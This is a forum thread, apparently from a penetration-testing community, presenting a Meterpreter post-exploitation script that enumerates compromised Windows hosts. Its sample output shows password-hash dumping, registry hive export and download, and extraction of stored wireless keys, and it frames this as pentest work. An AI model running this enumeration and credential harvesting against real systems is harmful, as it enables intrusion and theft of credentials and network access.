Results 1 to 10 of 14

Thread: Meterpeter Script for Quick Local Enumeration of Windows Hots

Hybrid View

  1. #1

    Default Meterpeter Script for Quick Local Enumeration of Windows Hots

    Hi

    Guys I recently made a small quick and dirty Meterpreter script for enumerating and gathering all the typical information I tend to gather out of Windows 2003 and XP hosts after a compromise. Since in most engagements I'm not allowed to install any software on the target hosts I made it so it will use windows native command line tools.

    here is a sample of running it, once a machine is exploited and meterpreter is deploy just type run winenum to launch the script:

    Code:
    meterpreter > run winenum 
    [*] Running Windows Local Enumerion Meterpreter Script by Darkoperator
    [*] New session on 10.10.10.7:1249...[*] Executing: set[*] Executing: arp -a
    [*] Executing: ipconfig /all
    [*] Executing: ipconfig /displaydns
    [*] Executing: route print
    [*] Executing: net view
    [*] Executing: netstat -na
    [*] Executing: netstat -ns
    [*] Executing: net share
    [*] Executing: net view
    [*] Executing: net group
    [*] Executing: net user
    [*] Executing: net localgroup
    [*] Executing: net view /domain
    [*] Executing: netsh firewall show config
    [*] Executing: wmic computersystem list
    [*] Executing: wmic useraccount list
    [*] Executing: wmic group
    [*] Executing: wmic service list brief
    [*] Executing: wmic volume list brief
    [*] Executing: wmic process list brief
    [*] Executing: wmic startup list full
    [*] Executing: wmic qfe
    [*] Downloading WDSRB.txt to -> /tmp/10.10.10.7_20081123.390899982
    [*] Dumping password hashes...
    [*] Exporting HKCU
    [*] Compressing HKCU into cab file for faster download
    [*] Exporting HKLM
    [*] Compressing HKLM into cab file for faster download
    [*] Exporting HKCC
    [*] Compressing HKCC into cab file for faster download
    [*] Exporting HKCR
    [*] Compressing HKCR into cab file for faster download
    [*] Exporting HKU
    [*] Compressing HKU into cab file for faster download
    [*] Downloading HKCU.cab to -> /tmp/10.10.10.7_20081123.390899982-HKCU
    [*] Downloading HKLM.cab to -> /tmp/10.10.10.7_20081123.390899982-HKLM
    [*] Downloading HKCC.cab to -> /tmp/10.10.10.7_20081123.390899982-HKCC
    [*] Downloading HKCR.cab to -> /tmp/10.10.10.7_20081123.390899982-HKCR
    [*] Downloading HKU.cab to -> /tmp/10.10.10.7_20081123.390899982-HKU
    [*] Removing anything we left behind...
    [*] Done!
    
    meterpreter >
    and here is the code, you have to place it in /pentest/exploits/framework3/script/meterpreter/ and name it winenum.rb

    UPDATE:
    Josh Wright from Inguardians published a great paper called Vista Wireless Power Tools on the new features of Windows Vista wireless commands plus published several tools. I added the enumerations commands to Winenum plus it will now export the registry keys where the wireless configured networks of Windows XP and Windows Vista machines is stored, this files can be imported into the pentesters windows bos to gain access to the clients network or to get the wireless keys using other tools after importing.

    let me know if you like it.

  2. #2
    Good friend of the forums
    Join Date
    Jun 2008
    Posts
    425

    Default

    Thanks, being looking for a autoscript that can get info about the sorounding network.
    I don't understand ruby, ? does that run on the target or your computer to get that info.

  3. #3

    Default

    It is running in your machine using the meterpreter API to execute the commands on the host you are connected to and it will also use some of the API like the PRIV Hashdump and the API to execute a download of the files thru the control channel.

  4. #4
    Member
    Join Date
    Feb 2010
    Posts
    204

    Default

    excellent work,

    could do with your help in the fake ap thread

  5. #5
    Member
    Join Date
    Jan 2010
    Posts
    81

    Default

    nice work..


    have you a tool to open .cab files in BackTrack?


    cherrs ozzy

    oh sorry i mine .cab .....

  6. #6
    Member hawaii67's Avatar
    Join Date
    Feb 2006
    Posts
    318

    Default

    Quote Originally Posted by ozzy66 View Post
    nice work..


    have you a tool to open .cap files in BackTrack?


    cherrs ozzy
    Wireshark? Tcpdump?
    Don't eat yellow snow :rolleyes:

  7. #7
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    2

    Default Session kill

    I have found this script works extremely well, great job! Just a quick question, is there a command that could be incorporated into the script to kill the active meterpreter session once it has completed the enumeration? Sometimes preferable over backgrounding. Thanks.

  8. #8

    Default

    just append to the end

    shell.stop

    thant should kill the meterpreter session

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •